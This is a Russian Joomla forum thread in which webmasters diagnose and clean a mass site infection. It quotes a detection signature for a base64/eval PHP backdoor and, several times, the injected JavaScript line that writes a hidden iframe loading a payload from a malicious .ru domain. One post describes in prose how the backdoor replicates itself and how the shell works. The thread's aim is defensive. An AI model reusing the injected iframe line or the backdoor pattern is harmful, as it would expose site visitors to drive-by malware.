[Решено] Заразились в один день 4 аккаунта по 10 сайтов - страница 8 - Безопасность сайтов на Joomla

Попробуйте поискать во-всех файлах следующий код

Код

(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']

или

Код

(@base64_decode

Ищите подозрительные файлы в папках сайта, с цифровым любым именем (например, 56454.php).

Надеюсь, вы код ищете не ручным способом (открытие каждого файла вручную)?

Все это искал. Ищу на локальной копии сайта с помощью программы Advanced Find and Replace. Все js файлы вычистил. А вот php не нашел ни одного. Как я понимаю, это проблему не снимает, где-то есть php файл, через который происходит заражение. Яндекс снял "черную метку". На долго ли....

Все это искал. Ищу на локальной копии сайта с помощью программы Advanced Find and Replace. Все js файлы вычистил. А вот php не нашел ни одного. Как я понимаю, это проблему не снимает, где-то есть php файл, через который происходит заражение. Яндекс снял "черную метку". На долго ли....

Попробуйте просканировать заражённый сайт через скрипт fls.php - данный скрипт может указать на подозрительные файлы не относящиеся к скрипту вашего сайта.

Для удобства поиска вирусов на сайте, лучше всего пользоваться Total Commander, зайдя на сайт через FTP клиент TC.

Заходим в нужную директорию с корнем сайта.

Нажимаем комбинацию клавиш на клавиатуре Alt+F7 вызывая функцию "Поиска файлов".  

Задаём нужные параметры поиска:

Ставим галочку перед "С текстом" в этой же строчке заносим ключ поиска.

Затем, нажимаем кнопку "Начать поиск".

Сканирование файлов сайта будет производиться через FTP-клиент.

Для удобства поиска вирусов на сайте, лучше всего пользоваться Total Commander, зайдя на сайт через FTP клиент TC.

Может поделишься,TC чем лучше FileZilla ?

Для удобства поиска вирусов на сайте, лучше всего пользоваться Total Commander, зайдя на сайт через FTP клиент TC.

Лучше чем что? Не думаю, что это хорошая идея. Если я буду делать так, мой хостер, на моем тарифе поставит мне дополнительную "черную метку" к Яшиной:)
Слишком большая нагрузка.
Я делаю так. Скачиваю весь сайт в архиве и потом уже на локалке изголяюсь с этим архивом.

Может поделишься,TC чем лучше FileZilla ?

Он хорош тем, что имеет встроенный поиск по-заданному ключу и заданным фильтром расширений поиска файлов на локальном диске и по FTP

Лучше чем что? Не думаю, что это хорошая идея. Если я буду делать так, мой хостер, на моем тарифе поставит мне дополнительную "черную метку" к Яшиной:)
Слишком большая нагрузка.

Лучше тем, что, вы не будете каждые несколько часов в день копировать содержимое ваших сайтов на поиск по-ключевому слову вредоносных скриптов.
Это долго и муторно, сначала копирование, затем запуск поиска...
В ТС комбинирована данная функция по работе с FTP без всяческих излишеств.

Не нужно путать нагрузку на ЦП сервера, где в большинстве установлен нагрузочный лимит в % на выполнение скриптов, и нагрузку на сетевой трафик с обращением в файловое хранилище, где хранится ваш сайт.
Если ваш хостинг-провайдер ставит "чёрную метку" на ваш аккаунт из-за копирование фалов на сервер и наоборот через FTP. Значит вам пора задуматься о смене хостинг-провайдера.     

Провел масштабную чистку портала от всего старья, нужные компоненты, плагины и модули обновил. Сканирую все чисто. У вас что-то находит?

Лучше тем, что, вы не будете каждые несколько часов в день копировать содержимое ваших сайтов на поиск по-ключевому слову вредоносных скриптов.
Это долго и муторно, сначала копирование, затем запуск поиска...
В ТС комбинирована данная функция по работе с FTP без всяческих излишеств.

Не нужно путать нагрузку на ЦП сервера, где в большинстве установлен нагрузочный лимит в % на выполнение скриптов, и нагрузку на сетевой трафик с обращением в файловое хранилище, где хранится ваш сайт.
Если ваш хостинг-провайдер ставит "чёрную метку" на ваш аккаунт из-за копирование фалов на сервер и наоборот через FTP. Значит вам пора задуматься о смене хостинг-провайдера.     

Я так и думал, что Вы так ответите. Спорить не буду

По теме. Пока все тихо. Вредоносного кода нет.  Думаю, что "они" готовят новую пакость

как вариант просмотреть js файлы на дописку в коде
document.write(*************

В js файлах нашел всё что искал именно тут. Это на сайтах с джумлой 2.5.9. Но что странно, вредоносный код был даже в новом шаблоне, с которым я еще не начал работать.
А на сайтах с 1.5.26 - в php файлах вышеописанные коды с @base64...., файлы j.php и jos_jarv.php, а также типа этих: 6a2cd327.php.  А в js ничего не обнаружил.

>>>Но что странно, вредоносный
код был даже в новом шаблоне

А  что тут странного если шаблон с варезника?

>>>Но что странно, вредоносный
код был даже в новом шаблоне

А  что тут странного если шаблон с варезника?

Вот лицензия: http://www.fashion-shopper.ru/ja_licencekey.txt

ой... И у меня есть, поверь.
А вот где вы берете шаблоны с "левым кодом", это другой вопрос...
Кстати, обновление шаблона, если истек срок подписки, тот же варез (согласно пользовательскому соглашению, если я его правильно запомнил).

Нет ни одного шаблона не то что варезного, даже бесплатного. Все покупаю. Как и расширения. Если бесплатных не существует. За обновления тоже плачу.
А код какой предоставили после оплаты, такой и разместил в корне.

значит не там покупаете, ссылку дайте народу... Будем все знать (

Доверяю этому источнику полностью. А ссылка она и не скрывается, так как на форуме в топике, может кто и обратится: http://joomlaforum.ru/index.php/topic,18141.0.html

А  что тут странного если шаблон с варезника?

Конкретно эта проблема связана с дырами расширений.
Сам пострадал. Узнал об этом от Яндекса 2 мая. Проковырялся всю ночь, вычислил по логам, куда POSTили гадость и вылечил бекапом (шел был только на 1-м сайте, остальные заразу поймали от него). Только потом нашел эту ветку форума.
Склоняюсь к тому, что у меня был не обновленный JCE, снес его нафиг и принял все меры, какие советовали тут и на серче.
До 5 мая ещё были в логах обращения с IP 93.189.х.х (сразу забанил эти ip). Сейчас перестали.
Яндекс снял черную метку только 6-го.
Сейчас полет нормальный.

Всем доброго дня! Я смотрю все успокоились))))
Есть ли среди нас программист который растолкует сам вирус (код проанализирует)?
Я вот поковырялся в инете и сделал для себя следующий вывод:
В конце вируса есть следующая строка--------  document.write('<iframe height="115" width="115" style="position:absolute;left:-1000px;top:-1000px;" src="http://impeccablepreselected.ru/JJJ7P.8Qd6?default"></iframe>');

Инет по этому поводу говорит

Классическая реализация - это когда клиент создает невидимый IFrame, ведущий на служебный URL. Сервер, получив соединение на этот URL, не закрывает его, а время от времени присылает блоки сообщений <script>...javascript...</script>. Появившийся в IFrame'е javascript тут же выполняется браузером, передавая информацию на основную страницу.
 }

Для меня стала ключевой фраза ---- получив соединение на этот URL

Смотрим этот URL в теле вируса--- http://impeccablepreselected.ru
Получатся это "технологический сайт" для атаки

Иду на NIC и проверяю этот сайт, понятное дело, что информация закрыта, но дата создания
domain:        IMPECCABLEPRESELECTED.RU
nserver:       ns1.r01.ru.
nserver:       ns2.r01.ru.
state:         REGISTERED, DELEGATED, VERIFIED
person:        Private Person
registrar:     R01-REG-RIPN
admin-contact: https://partner.r01.ru/contact_admin.khtml
created:       2013.03.19
paid-till:     2014.03.19
free-date:     2014.04.19
source:        TCI

Таким образом подготовка началась/вступила в активную фазу в марте

Если бы у нас государство действительно боролось с такими "вирусописателями", то не стоило труда запросить данные при регистрации домена, IP по которым происходила настройка домена и т.д.

Таким образом найти "человека" не трудно)))))

Всем доброго дня! Я смотрю все успокоились))))
Есть ли среди нас программист который растолкует сам вирус (код проанализирует)?
Я вот поковырялся в инете и сделал для себя следующий вывод:
В конце вируса есть следующая строка--------  document.write('<iframe height="115" width="115" style="position:absolute;left:-1000px;top:-1000px;" src="http://impeccablepreselected.ru/JJJ7P.8Qd6?default"></iframe>');

Инет по этому поводу говорит

Классическая реализация - это когда клиент создает невидимый IFrame, ведущий на служебный URL. Сервер, получив соединение на этот URL, не закрывает его, а время от времени присылает блоки сообщений <script>...javascript...</script>. Появившийся в IFrame'е javascript тут же выполняется браузером, передавая информацию на основную страницу.
 }

Для меня стала ключевой фраза ---- получив соединение на этот URL

Смотрим этот URL в теле вируса--- http://impeccablepreselected.ru
Получатся это "технологический сайт" для атаки

Иду на NIC и проверяю этот сайт, понятное дело, что информация закрыта, но дата создания
domain:        IMPECCABLEPRESELECTED.RU
nserver:       ns1.r01.ru.
nserver:       ns2.r01.ru.
state:         REGISTERED, DELEGATED, VERIFIED
person:        Private Person
registrar:     R01-REG-RIPN
admin-contact: https://partner.r01.ru/contact_admin.khtml
created:       2013.03.19
paid-till:     2014.03.19
free-date:     2014.04.19
source:        TCI

Таким образом подготовка началась/вступила в активную фазу в марте

Если бы у нас государство действительно боролось с такими "вирусописателями", то не стоило труда запросить данные при регистрации домена, IP по которым происходила настройка домена и т.д.

Таким образом найти "человека" не трудно)))))

По вашему домены на себя регистрируют? и вопше свои ли используют....

Вот Вы наивный человек))) Вы саму суть моего поста читайте.
Без условно не на себя, и телефон (сим карта) на который приходит код при регистрации куплен у метро за 200 р., и IP захода по FTP через прокси и т.д.
Вы просто какой то пессимист((((
"Человек" который все это сделал, он ведь то же человек)))) И явно где то оставил следы)))
И эти следы я "показал"
Почему и пост был на тему ЕСТЬ ЛИ СРЕДИ НАС ПРОГРАММИСТ?

Есть ли среди нас программист который растолкует сам вирус (код проанализирует)?
Я вот поковырялся в инете и сделал для себя следующий вывод:
В конце вируса есть следующая строка--------  document.write('<iframe height="115" width="115" style="position:absolute;left:-1000px;top:-1000px;" src="#"></iframe>');

Инет по этому поводу говорит

Классическая реализация - это когда клиент создает невидимый IFrame, ведущий на служебный URL. Сервер, получив соединение на этот URL, не закрывает его, а время от времени присылает блоки сообщений <script>...javascript...</script>. Появившийся в IFrame'е javascript тут же выполняется браузером, передавая информацию на основную страницу.
 }

Для меня стала ключевой фраза ---- получив соединение на этот URL

Смотрим этот URL в теле вируса--- http://impeccablepreselected.ru
Получатся это "технологический сайт" для атаки

Ну пока нет программиста.
document.write - выводит в браузер содержимое,всего один раз.
В содержимом содержится путь к загружаемом у файлу. Этот файл и загружается, и выводится в браузере.

То что делает document.write это понятно)))))
Я это уже описал. А то получается------Солнце.......... светит, ветер........ дует, вода......мокрая и т.д.
Давайте конкретно!
Я же привел конкретные примеры. Давайте по делу! Давайте АНАЛИЗ ситуации, а не констатацию "прописных истин"

То что делает document.write это понятно)))))
Я это уже описал.
Давайте конкретно!
Я же привел конкретные примеры. Давайте по делу! Давайте АНАЛИЗ ситуации, а не констатацию "прописных истин"

Ты описал разные сценарии скриптов. А не точное поведение скрипта загружаемого, по указанному пути в iframe.
п.с.
Я же специально подчеркнул
document.write - выводит в браузер содержимое,всего один раз.
А ты читаешь только свое, считая взятую где то инфу, единственно правильной.

ДА! Давно слежу за данной темой.
А решения, так и нет!
Проблема такая-же, и в последнее время тоже /*214afaae*.......
Начинается вот с чего...
После этого в папке images появляются 2-а упомянутых в логах файла, ну а уже не много погодя, именно в последнее время,
прописывается всё то что здесь обсуждается в последнее время  /*214afaae*......  и php  файлы (@base64_decode......

Доброй ночи, господа и дамы.

Слежу за этой темой почти с самого начала. Но пока больше анализировал и наблюдал.
Расскажу по порядку.

Один из моих клиентов обратился ко мне в первых числах мая, за помощью по удалению вирусов, ибо Яндекс ему прислал оповещение о вредоносном коде на сайте.
Я начал разбираться, что к чему. Сначала нашел признаки заражения, по которым нашел скриптах код редиректа.
Тогда же, к слову, я и нашел данную тему.

Про скрипты

Код, который дописывается в скриптах - создает iframe за пределами окна.
Он имеет функции:
поиска подстроки
проверки браузера
установки куки
и непосредственно код вывода фрейма.

Фрейм выводится только при отсутствии куки у пользователя и если браузер клиента не в блек листе. Кука ставится на различный срок. В моем случае в блек листе фигурировал только Chrome.
В коде который приведен в закрепленном наверху сообщении, кука ставится на срок в один час - т.е. фрейм показывается пользователю раз в час.

Код имеет несколько модификаций. В частности отличаются названия функций определения браузера, список браузеров из блек листа (то есть при пользовании которыми код не срабатывает), а так же меняется название куки.
Участки которые дописываются в начале и в конце кода (к примеру  /*214afaae*/) являются маркерами -  для вставки, контроля и удаления участков кода.
Благодаря маркерам скрипты в какой то момент "очистились" - код, который разослали по зараженным доменам содержал инструкцию по "вырезанию" участков зараженного кода.

Относительно того, что вгружают во врейм
Когда анализировал код на доменах клиента, я выгрузил страницу с адреса, который вгоняется во фрейм.
В моем случае там был скопированный код главной страницы Google, в который явно внесены доп. участки кода, которые и несут нагрузку.
Код же Google, вероятно, используется как "обертка", так как является обфусцированным (намеренно запутанным, обычно машиннным образом, для не программистов) что облегчает процесс внедрения доп. кода - т.к. его сложнее отловить.
В адресе, который фигурирует в прикрепленном сообщении сверху, страницу содрали со студии звукозаписи. Сейчас на первый взгляд, вредоносного кода на странице нет.
Но думаю это связано и с тем, что ботоводы, сейчас изъяли код с ресурсов, думаю, что и из фреймовых адресов код стерт, на всякий случай.

По вопросу js файлов вроде бы все осветил, пока что.

Как заражали (размышления)

Исходя из найденого, и увиденного, сделал вывод - что заражали через уязвимость в nonumber, как уже не раз говорили ранее.
Механизм такой - через дырку в папку /images прописывался файл (j.php), через который заливали шелл (jos_XXXX.php)
Шелл представлет собой WOS 2.5 - довольно распространенный шелл. Так что мой вам совет - трите подозрительные файлы из images не раздумывая.
Итак, далее. Шелл, в дальнейшем, используется скорее всего для генерации первого файла из серии тех что содержат $_COOKIE[_utma] и т.д.
_utma - это действительно название куки Google аналитикс, чем обусловлен выбор именно этого название пока неизвестно, ну да не в нем суть, надеюсь

Поехали дальше.

Те файлы, что содержат код eval($msg) и т.д. ( выше я ссылался на них по $_COOKIE[_utma] ), являются универсальными "окнами", через которые идет автоматический опрос и управление файлами зараженных сайтов.
Код который они содержат работает просто: если у запрашивающего есть определенная кука, с определенным значениям, и определенная переменная, переданная POST запросом ($_POST['msg']), то идет процесс ее расшифровки, а затем исполнения. Код который исполняется, на выходе выводит строку, которую обрамляют в textarea. После отработки скрипт принудительно завершается.

Помозговав над access logs, я понял куда стучатся наши гости. не смотря на обилие файлов. которые мы находим, простукивание домена идет обычно по одному файлу.
Немного поколдовав над зараженным файлом, я в итоге, получил код, который шлют нам гости. Здесь выкладывать код не буду. Заинтересованные могут написать мне в личку.
Расскажу о его назначении.
За время мониторинга было обнаружено пока только два типа кода, которые приходят на сервер.

Первый код - является "опросным". В нем домен проверяется на мультиязычность, на возможность записи в .htaccess, и проверяются пути.
На выходе, код отдает следующее.
Переменная wr указывает возможность записи .htaccess

Второй код - обеспечивает репликацию "окон". В его основе лежит хорошая функция нахождения потенциально годных папок.
Когда я вычленил эту функцию и прогнал по сайту, она вернула мне больше 700 папок, в которые скрипт потенциально мог записать свою копию.
Итак сначала код сканирует сайт, получает список возможных мест для файла, хатем на рандоме выбирает папку для записи, генерит себе рандомное имя в пределах от 4 до 10 символов и пишет себя по выбраному адресу. Пишет сначала последовательность символов. Потом сам берет этот файл и проверяет на наличие последовательности. Если нашел последовательность - значит записал файл - выходит из цикла и пишет по адресу уже основной код - как раз тот, который с проверкой куки _utma. На выходе отдает url записанного файла. Таким образом скрипт маскирует себя, оставляя копии по всей системе, чтобы в случае удаления основного файла, перебрать остальные адреса.

Наверняка есть и третий и четвертый коды, которые пишут и удаляют вирусные последовательности в js скриптах.
Но за время мониторинга они мне не попадались.

Относительно адресов

Адреса, с которых ведутся действия принадлежат компании "НТКОМ". А конкретнее ее хост проекту "Hostink".
Надо отметить, что и все домены, которые используются для фреймов завязаны там же.
Домены зарегистрированы в регистраторе r01.ru.

Пример Network Whois по одному из IP адресов:

А вот по одному из доменов (тому, котрый указан в прикрепленном сообщении)

А первоначальные заражения происходят через вьетнамский проксик, по видимому

Относительно лечения

Все правильные советы уже сказали в принципе:
смотреть far'ом или total commander'ом файлы по сигнатурам, удалять их,
обновить компоненты nonumber, а еще лучше снести их,
сменить пароли на всем что можно, а также на всякий случай не хранить пароли в клиенте

В ближайшее время, скорее всего, предоставлю инструмент для анализа access logs на предмет заражения.

Если возникнут вопросы, предложения, пишите в эту ветку или в ЛС.
А так же прошу господина iazon'a написать мне - хотелось бы промониторить заражения. Инструменты для этого у меня в наличии.

Всем спасибо за прочтение.

Вот и у меня несколько сайтов заражено. Те же симптомы, файлы j.php, jos_lp2h.php, jos_yhst.php появились в папке images и потом расползалось по всему сайту.
Был установлен nonumber его снёс, удалил кучу левых php файлов. В джава скриптах уже ничего не было. Что интересно один сайт не заразился хотя на нём тоже были плагины от nonumber но к тому же ещё установлен плагин jHackGuard. Возможно он и спас. Но появилась другая беда, куча левый сессий которые не убиваются через админку. Приходится вручную в phpMyAdmin удалять весь этот левак. Вот скрин:



У кого нибудь подобное наблюдается?

Подтверждаю, всё заново началось. До этого после первого заражения был удалён шелл, левые php и очищены все js. Пароли от всего были заменены. А вечером снова несколько сайтов инфицировались. Шелл уже не нашёл было только несколько левых php а вот джава были все до единого инфицированы.

Начал чистить 2 сайта вчера.Ничего не добавилось, по состоянию на утро сегодня.
Удалил вставки в начале яваскрипта, символы рандомно меняются

Удален 1 шелл из папки /includes.Код шелла уже выложили тут на форуме.
Установил плагин Security - jHackGuard.

Начал чистить 2 сайта вчера.Ничего не добавилось, по состоянию на утро сегодня.
Удалил вставки в начале яваскрипта, символы рандомно меняются

Код

/*214afaae*/

Удален 1 шелл из папки /includes.Код шелла уже выложили тут на форуме.
Установил плагин Security - jHackGuard.

Не соглашусь - символы не рандомные, отнюдь. есть всего два типа, как показала практика - это старый маркер (214af....) и новый маркер (914da....)

Возможно инфицирование файлов на очищаемых сайтах было проведено еще под старой версией.